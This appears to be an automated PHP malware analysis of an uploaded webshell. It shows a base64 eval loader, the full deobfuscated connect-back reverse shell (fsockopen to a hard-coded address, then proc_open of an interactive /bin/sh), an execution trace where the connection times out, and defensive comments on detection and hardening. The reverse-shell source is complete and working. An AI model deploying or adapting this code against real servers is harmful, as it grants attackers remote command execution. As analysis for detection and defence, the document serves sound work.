PHP Malware Analysis

shell.php

md5: c49908f4ea7a6139434712a0f1675c58


Deobfuscated PHP code

<?php

eval /* PHPDeobfuscator eval output */ {
    // Stage-2 payload after base64 decoding: a connect-back ("reverse") shell.
    // Nothing in this block reads request input; every parameter is hard-coded,
    // so the call-back address and port are reliable indicators for this sample.
    // Defensive notes: the functions it depends on (fsockopen, proc_open,
    // pcntl_fork/posix_setsid) can be listed in php.ini `disable_functions` on a
    // web tier that never needs them, and egress filtering from the web server
    // would have stopped the connect below — the captured run did in fact time out.
    set_time_limit(0); // remove the execution-time cap so the relay loop can run indefinitely
    $VERSION = "1.0";
    $ip = '192.168.16.49'; // call-back address as captured (an RFC 1918 private address)
    $port = 443; // call-back port; fsockopen() with no ssl:// prefix, so plaintext TCP on the HTTPS port
    $chunk_size = 1400; // bytes per fread() in the relay loop
    $write_a = null;
    $error_a = null; // write/except sets for stream_select() are never used
    $shell = 'uname -a; w; id; /bin/sh -i'; // command line handed to proc_open(): host/user recon, then an interactive sh
    $daemon = 0;
    $debug = 0;
    // Detach from the PHP worker when the pcntl extension is available. The trace
    // on this page shows function_exists('pcntl_fork') returning FALSE, so the
    // else branch ran in the captured execution.
    if (function_exists('pcntl_fork')) {
        $pid = pcntl_fork();
        if ($pid == -1) {
            printit("ERROR: Can't fork");
            exit(1);
        }
        if ($pid) {
            exit(0); // parent returns to the web server; the child carries on below
        }
        if (posix_setsid() == -1) {
            printit("Error: Can't setsid()");
            exit(1);
        }
        $daemon = 1; // NOTE: printit() is a separate function scope and never sees this value
    } else {
        printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
    }
    chdir("/");
    umask(0);
    // Outbound connect-back with a 30 s timeout. In the captured run this returned
    // FALSE after ~30 s ('Connection timed out (110)'), so nothing past the exit()
    // below executed; the message itself was written into the HTTP response body.
    $sock = fsockopen($ip, $port, $errno, $errstr, 30);
    if (!$sock) {
        printit("{$errstr} ({$errno})");
        exit(1);
    }
    // Spawn the shell with stdin (0) readable and stdout/stderr (1, 2) writable
    // from its side, so all three can be relayed over the socket.
    $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
    $process = proc_open($shell, $descriptorspec, $pipes);
    if (!is_resource($process)) {
        printit("ERROR: Can't spawn shell");
        exit(1);
    }
    // Non-blocking I/O on all four streams; stream_select() below does the waiting.
    stream_set_blocking($pipes[0], 0);
    stream_set_blocking($pipes[1], 0);
    stream_set_blocking($pipes[2], 0);
    stream_set_blocking($sock, 0);
    printit("Successfully opened reverse shell to {$ip}:{$port}");
    // Relay loop: socket -> shell stdin, shell stdout/stderr -> socket. Runs until
    // either the socket or the shell's stdout reaches EOF. From the host side this
    // looks like a web-server worker holding a long-lived outbound TCP session
    // with a /bin/sh child process — a useful detection signature.
    while (1) {
        if (feof($sock)) {
            printit("ERROR: Shell connection terminated");
            break;
        }
        if (feof($pipes[1])) {
            printit("ERROR: Shell process terminated");
            break;
        }
        $read_a = array($sock, $pipes[1], $pipes[2]);
        // Null timeout: block until at least one of the three streams is readable.
        // stream_select() rewrites $read_a to hold only the ready streams.
        $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
        if (in_array($sock, $read_a)) {
            if ($debug) {
                printit("SOCK READ");
            }
            $input = fread($sock, $chunk_size);
            if ($debug) {
                printit("SOCK: {$input}");
            }
            fwrite($pipes[0], $input); // bytes from the remote operator go to the shell's stdin
        }
        if (in_array($pipes[1], $read_a)) {
            if ($debug) {
                printit("STDOUT READ");
            }
            $input = fread($pipes[1], $chunk_size);
            if ($debug) {
                printit("STDOUT: {$input}");
            }
            fwrite($sock, $input); // shell stdout back to the remote side
        }
        if (in_array($pipes[2], $read_a)) {
            if ($debug) {
                printit("STDERR READ");
            }
            $input = fread($pipes[2], $chunk_size);
            if ($debug) {
                printit("STDERR: {$input}");
            }
            fwrite($sock, $input); // shell stderr back to the remote side
        }
    }
    // Teardown after the loop exits.
    fclose($sock);
    fclose($pipes[0]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($process);
    /**
     * Prints a diagnostic line, intended to be suppressed once daemonised.
     *
     * $daemon is a script-level variable and this function neither declares it
     * `global` nor receives it as an argument, so inside the function it is
     * always undefined (falsy) and the message is printed unconditionally. The
     * output therefore lands in the web server's HTTP response — the "Generated
     * HTML code" section on this page shows both messages from the captured run —
     * which is a handy artifact when reviewing responses or logs for this shell.
     *
     * Declared after its call sites; PHP hoists unconditional function
     * declarations, and the trace confirms the earlier calls resolved.
     *
     * @param string $string text to print (a newline is appended)
     * @return void
     */
    function printit($string)
    {
        if (!$daemon) {
            print "{$string}\n";
        }
    }
    ?> 
<?php 
};

Execution traces

data/traces/c49908f4ea7a6139434712a0f1675c58_trace-1676257480.1188.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:05:06.016652]
1	0	1	0.000137	393512
1	3	0	0.000196	396496	{main}	1		/var/www/html/uploads/shell.php	0	0
2	4	0	0.000213	396496	base64_decode	0		/var/www/html/uploads/shell.php	1	1	'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'
2	4	1	0.000257	399600
2	4	R			'<?php\nset_time_limit (0);\n$VERSION = "1.0";\n$ip = \'192.168.16.49\'; \n$port = 443;       \n$chunk_size = 1400;\n$write_a = null;\n$error_a = null;\n$shell = \'uname -a; w; id; /bin/sh -i\';\n$daemon = 0;\n$debug = 0;\n\nif (function_exists(\'pcntl_fork\')) {\n\t$pid = pcntl_fork();\n\t\n\tif ($pid == -1) {\n\t\tprintit("ERROR: Can\'t fork");\n\t\texit(1);\n\t}\n\t\n\tif ($pid) {\n\t\texit(0);  \n\t}\n\tif (posix_setsid() == -1) {\n\t\tprintit("Error: Can\'t setsid()");\n\t\texit(1);\n\t}\n\n\t$daemon = '
2	5	0	0.000418	424536	eval	1	'?><?php\nset_time_limit (0);\n$VERSION = "1.0";\n$ip = \'192.168.16.49\'; \n$port = 443;       \n$chunk_size = 1400;\n$write_a = null;\n$error_a = null;\n$shell = \'uname -a; w; id; /bin/sh -i\';\n$daemon = 0;\n$debug = 0;\n\nif (function_exists(\'pcntl_fork\')) {\n\t$pid = pcntl_fork();\n\t\n\tif ($pid == -1) {\n\t\tprintit("ERROR: Can\'t fork");\n\t\texit(1);\n\t}\n\t\n\tif ($pid) {\n\t\texit(0);  \n\t}\n\tif (posix_setsid() == -1) {\n\t\tprintit("Error: Can\'t setsid()");\n\t\texit(1);\n\t}\n\n\t$daemon = 1;\n} else {\n\tprintit("WARNING: Failed to daemonise.  This is quite common and not fatal.");\n}\n\nchdir("/");\n\numask(0);\n\n$sock = fsockopen($ip, $port, $errno, $errstr, 30);\nif (!$sock) {\n\tprintit("$errstr ($errno)");\n\texit(1);\n}\n\n$descriptorspec = array(\n   0 => array("pipe", "r"),\n   1 => array("pipe", "w"),\n   2 => array("pipe", "w") \n);\n\n$process = proc_open($shell, $descriptorspec, $pipes);\n\nif (!is_resource($process)) {\n\tprintit("ERROR: Can\'t spawn shell");\n\texit(1);\n}\nstream_set_blocking($pipes[0], 0);\nstream_set_blocking($pipes[1], 0);\nstream_set_blocking($pipes[2], 0);\nstream_set_blocking($sock, 0);\n\nprintit("Successfully opened reverse shell to $ip:$port");\n\nwhile (1) {\n\tif (feof($sock)) {\n\t\tprintit("ERROR: Shell connection terminated");\n\t\tbreak;\n\t}\n\n\tif (feof($pipes[1])) {\n\t\tprintit("ERROR: Shell process terminated");\n\t\tbreak;\n\t}\n\n\t$read_a = array($sock, $pipes[1], $pipes[2]);\n\t$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n\n\tif (in_array($sock, $read_a)) {\n\t\tif ($debug) printit("SOCK READ");\n\t\t$input = fread($sock, $chunk_size);\n\t\tif ($debug) printit("SOCK: $input");\n\t\tfwrite($pipes[0], $input);\n\t}\n\n\tif (in_array($pipes[1], $read_a)) {\n\t\tif ($debug) printit("STDOUT READ");\n\t\t$input = fread($pipes[1], $chunk_size);\n\t\tif ($debug) printit("STDOUT: $input");\n\t\tfwrite($sock, $input);\n\t}\n\n\tif 
(in_array($pipes[2], $read_a)) {\n\t\tif ($debug) printit("STDERR READ");\n\t\t$input = fread($pipes[2], $chunk_size);\n\t\tif ($debug) printit("STDERR: $input");\n\t\tfwrite($sock, $input);\n\t}\n}\n\nfclose($sock);\nfclose($pipes[0]);\nfclose($pipes[1]);\nfclose($pipes[2]);\nproc_close($process);\n\nfunction printit ($string) {\n\tif (!$daemon) {\n\t\tprint "$string\\n";\n\t}\n}\n\n?> \n'	/var/www/html/uploads/shell.php	1	0
3	6	0	0.000487	424536	set_time_limit	0		/var/www/html/uploads/shell.php(1) : eval()'d code	2	1	0
3	6	1	0.000504	424600
3	6	R			FALSE
2		A						/var/www/html/uploads/shell.php(1) : eval()'d code	3	$VERSION = '1.0'
2		A						/var/www/html/uploads/shell.php(1) : eval()'d code	4	$ip = '192.168.16.49'
2		A						/var/www/html/uploads/shell.php(1) : eval()'d code	5	$port = 443
2		A						/var/www/html/uploads/shell.php(1) : eval()'d code	6	$chunk_size = 1400
2		A						/var/www/html/uploads/shell.php(1) : eval()'d code	7	$write_a = NULL
2		A						/var/www/html/uploads/shell.php(1) : eval()'d code	8	$error_a = NULL
2		A						/var/www/html/uploads/shell.php(1) : eval()'d code	9	$shell = 'uname -a; w; id; /bin/sh -i'
2		A						/var/www/html/uploads/shell.php(1) : eval()'d code	10	$daemon = 0
2		A						/var/www/html/uploads/shell.php(1) : eval()'d code	11	$debug = 0
3	7	0	0.000617	424568	function_exists	0		/var/www/html/uploads/shell.php(1) : eval()'d code	13	1	'pcntl_fork'
3	7	1	0.000631	424608
3	7	R			FALSE
3	8	0	0.000645	424568	printit	1		/var/www/html/uploads/shell.php(1) : eval()'d code	31	1	'WARNING: Failed to daemonise.  This is quite common and not fatal.'
3	8	1	0.000678	424568
3	9	0	0.000686	424568	chdir	0		/var/www/html/uploads/shell.php(1) : eval()'d code	34	1	'/'
3	9	1	0.000703	424640
3	9	R			TRUE
3	10	0	0.000717	424600	umask	0		/var/www/html/uploads/shell.php(1) : eval()'d code	36	1	0
3	10	1	0.000731	424632
3	10	R			18
3	11	0	0.000744	424648	fsockopen	0		/var/www/html/uploads/shell.php(1) : eval()'d code	38	5	'192.168.16.49'	443	NULL	NULL	30
3	11	1	30.030531	424864
3	11	R			FALSE
2		A						/var/www/html/uploads/shell.php(1) : eval()'d code	38	$sock = FALSE
3	12	0	30.030580	424752	printit	1		/var/www/html/uploads/shell.php(1) : eval()'d code	40	1	'Connection timed out (110)'
3	12	1	30.030604	424752
			30.030643	345408
TRACE END   [2023-02-13 01:05:36.047185]


Generated HTML code

<html><head></head><body>WARNING: Failed to daemonise.  This is quite common and not fatal.
Connection timed out (110)
</body></html>

Original PHP code

<?php
/*
 * Stage-1 loader: base64-decodes the embedded payload and eval()s it. The "?>"
 * prefix takes eval out of PHP mode first, so the decoded text — which begins
 * with "<?php" (see the eval argument recorded in the trace above) — is parsed
 * as code. An eval(base64_decode(...)) pair with no other logic in the file is
 * a well-known webshell loader shape and a reasonable static-scan signature.
 */
eval("?>".base64_decode("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")); ?>